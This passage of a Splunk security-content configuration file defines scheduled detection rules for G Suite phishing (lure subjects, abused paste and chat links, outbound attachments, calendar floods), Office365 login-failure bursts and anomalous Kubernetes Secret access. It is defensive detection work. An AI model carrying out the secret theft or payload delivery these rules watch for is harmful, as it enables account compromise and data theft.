suspicious subject having known file type used in spear phishing. This technique is a common and effective entry vector of attacker to compromise a network by luring the user to click or execute the suspicious attachment send from external email account because of the effective social engineering of subject related to delivery, bank and so on. On the other hand this detection may catch a normal email traffic related to legitimate transaction so better to check the email sender, spelling and etc. avoid click link or opening the attachment if you are not expecting this type of e-mail. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a gsuite email contains suspicious subject having known file type used in spear phishing. This technique is a common and effective entry vector of attacker to compromise a network by luring the user to click or execute the suspicious attachment send from external email account because of the effective social engineering of subject related to delivery, bank and so on. On the other hand this detection may catch a normal email traffic related to legitimate transaction so better to check the email sender, spelling and etc. avoid click link or opening the attachment if you are not expecting this type of e-mail. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = normal user or normal transaction may contain the subject and file type attachment that this detection try to search. action.escu.creation_date = 2021-08-19 action.escu.modification_date = 2021-08-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Email Suspicious Subject With Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Email Suspicious Subject With Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` num_message_attachments > 0 subject IN ("*dhl*", "* ups *", "*delivery*", "*parcel*", "*label*", "*invoice*", "*postal*", "* fedex *", "* usps *", "* express *", "*shipment*", "*Banking/Tax*","*shipment*", "*new order*") attachment{}.file_extension_type IN ("doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "zip", "rar", "html","htm","hta") | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex field=destination{}.address "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime values(attachment{}.file_extension_type) as email_attachments, values(attachment{}.sha256) as attachment_sha256, values(payload_size) as payload_size by destination{}.service num_message_attachments subject destination{}.address source.address phase severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_email_suspicious_subject_with_attachment_filter` [ESCU - Gsuite Email With Known Abuse Web Service Link - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytics is to detect a gmail containing a link that are known to be abused by malware or attacker like pastebin, telegram and discord to deliver malicious payload. This event can encounter some normal email traffic within organization and external email that normally using this application and services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytics is to detect a gmail containing a link that are known to be abused by malware or attacker like pastebin, telegram and discord to deliver malicious payload. This event can encounter some normal email traffic within organization and external email that normally using this application and services. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = normal email contains this link that are known application within the organization or network can be catched by this detection. action.escu.creation_date = 2021-08-23 action.escu.modification_date = 2021-08-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Email With Known Abuse Web Service Link - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Email With Known Abuse Web Service Link - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` "link_domain{}" IN ("*pastebin.com*", "*discord*", "*telegram*","t.me") | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex field=destination{}.address "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" |stats values(link_domain{}) as link_domains min(_time) as firstTime max(_time) as lastTime count by is_spam source.address source.from_header_address subject destination{}.address phase severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_email_with_known_abuse_web_service_link_filter` [ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious outbound e-mail from internal email to external email domain. This can be a good hunting query to monitor insider or outbound email traffic for not common domain e-mail. The idea is to parse the domain of destination email check if there is a minimum outbound traffic < 20 with attachment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003", "T1048"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious outbound e-mail from internal email to external email domain. This can be a good hunting query to monitor insider or outbound email traffic for not common domain e-mail. The idea is to parse the domain of destination email check if there is a minimum outbound traffic < 20 with attachment. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = network admin and normal user may send this file attachment as part of their day to day work. having a good protocol in attaching this file type to an e-mail may reduce the risk of having a spear phishing attack. action.escu.creation_date = 2024-03-25 action.escu.modification_date = 2024-03-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops", "Insider Threat"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003", "T1048"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` num_message_attachments > 0 | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex field=destination{}.address "[^@]+@(?[^@]+)" | where source_domain="internal_test_email.com" and not dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" | stats values(subject) as subject, values(source.from_header_address) as src_domain_list, count as numEvents, dc(source.from_header_address) as numSrcAddresses, min(_time) as firstTime max(_time) as lastTime by dest_domain phase severity | where numSrcAddresses < 20 |sort - numSrcAddresses | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_outbound_email_with_attachment_to_external_domain_filter` [ESCU - Gsuite suspicious calendar invite - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search can help the detection of compromised accounts or internal users sending suspcious calendar invites via GSuite calendar. These invites may contain malicious links or attachments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search can help the detection of compromised accounts or internal users sending suspcious calendar invites via GSuite calendar. These invites may contain malicious links or attachments. action.escu.how_to_implement = In order to successfully implement this search, you need to be ingesting logs related to gsuite (gsuite:calendar:json) having the file sharing metadata like file type, source owner, destination target user, description, etc. This search can also be made more specific by selecting specific emails, subdomains timeframe, organizational units, targeted user, etc. In order for the search to work for your environment please update `yourdomain.com` value in the query with the domain relavant for your organization. action.escu.known_false_positives = This search will also produce normal activity statistics. Fields such as email, ip address, name, parameters.organizer_calendar_id, parameters.target_calendar_id and parameters.event_title may give away phishing intent.For more specific results use email parameter. action.escu.creation_date = 2021-10-24 action.escu.modification_date = 2021-10-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite suspicious calendar invite - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Spearphishing Attachments"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Gsuite suspicious calendar invite - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_calendar` |bin span=5m _time |rename parameters.* as * |search target_calendar_id!=null email="*yourdomain.com"| stats count values(target_calendar_id) values(event_title) values(event_guest) by email _time | where count >100| `gsuite_suspicious_calendar_invite_filter` [ESCU - Gsuite Suspicious Shared File Name - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a shared file in google drive with suspicious file name that are commonly used by spear phishing campaign. This technique is very popular to lure the user by running a malicious document or click a malicious link within the shared file that will redirected to malicious website. This detection can also catch some normal email communication between organization and its external customer. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a shared file in google drive with suspicious file name that are commonly used by spear phishing campaign. This technique is very popular to lure the user by running a malicious document or click a malicious link within the shared file that will redirected to malicious website. This detection can also catch some normal email communication between organization and its external customer. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. In order for the search to work for your environment, please edit the query to use your company specific email domain instead of `internal_test_email.com`. action.escu.known_false_positives = normal user or normal transaction may contain the subject and file type attachment that this detection try to search action.escu.creation_date = 2021-08-23 action.escu.modification_date = 2021-08-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Suspicious Shared File Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious share gdrive from $parameters.owner$ to $email$ namely as $parameters.doc_title$ action.risk.param._risk = [{"risk_object_field": "parameters.owner", "risk_object_type": "other", "risk_score": 21}, {"risk_object_field": "email", "risk_object_type": "user", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Suspicious Shared File Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_drive` parameters.owner_is_team_drive=false "parameters.doc_title" IN ("*dhl*", "* ups *", "*delivery*", "*parcel*", "*label*", "*invoice*", "*postal*", "*fedex*", "* usps *", "* express *", "*shipment*", "*Banking/Tax*","*shipment*", "*new order*") parameters.doc_type IN ("document","pdf", "msexcel", "msword", "spreadsheet", "presentation") | rex field=parameters.owner "[^@]+@(?[^@]+)" | rex field=parameters.target_user "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" | stats count min(_time) as firstTime max(_time) as lastTime by email parameters.owner parameters.target_user parameters.doc_title parameters.doc_type phase severity | rename parameters.target_user AS user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_suspicious_shared_file_name_filter` [ESCU - High Number of Login Failures from a single source - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. Specifically, it identifies scenarios where there are more than 10 unsuccessful login attempts within a short time frame. The detection leverages Office365 management activity logs, specifically the AzureActiveDirectoryStsLogon records from the AzureActiveDirectory workload. It aggregates these logs in 5-minute intervals to count the number of failed login attempts and associates them with the originating source IP address. Multiple failed login attempts from a single source can be indicative of brute-force attacks, password spraying, or other malicious authentication attempts. Identifying and responding to these patterns promptly can prevent unauthorized access and potential breaches. If this detection represents a true positive, an attacker might be attempting to gain unauthorized access to an Office365 account. Successful compromise could lead to unauthorized access to sensitive data, potential lateral movement within the organization, or further malicious activities using the compromised account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.001", "T1110"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. Specifically, it identifies scenarios where there are more than 10 unsuccessful login attempts within a short time frame. The detection leverages Office365 management activity logs, specifically the AzureActiveDirectoryStsLogon records from the AzureActiveDirectory workload. It aggregates these logs in 5-minute intervals to count the number of failed login attempts and associates them with the originating source IP address. Multiple failed login attempts from a single source can be indicative of brute-force attacks, password spraying, or other malicious authentication attempts. Identifying and responding to these patterns promptly can prevent unauthorized access and potential breaches. If this detection represents a true positive, an attacker might be attempting to gain unauthorized access to an Office365 account. Successful compromise could lead to unauthorized access to sensitive data, potential lateral movement within the organization, or further malicious activities using the compromised account. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. Adjust the threshold value to suit the specific environment, as environments with naturally higher login failures might generate false positives at a lower threshold. action.escu.known_false_positives = An Ip address with more than 10 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - High Number of Login Failures from a single source - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Ip address $src_ip$ failed to authenticate more than 10 times in a 5 minute action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Number of Login Failures from a single source - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.001", "T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(user) as user values(LogonError) as LogonError values(signature) as signature values(UserAgent) as UserAgent by _time, src_ip | where failed_attempts > 10 | `high_number_of_login_failures_from_a_single_source_filter` [ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by country. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by country. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual location $Country$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | iplocation sourceIPs{} | fillnull | search NOT `kube_allowed_loactions` | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb City Country | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_location_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user agent. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user agent. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user agent $userAgent$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_agents` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_agent_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user group. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user group. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user group $user.groups{}$ by user name $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_groups` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_group_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user name. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user name. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user name $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule action.correlationsearch.annotations = {"analytic_story": 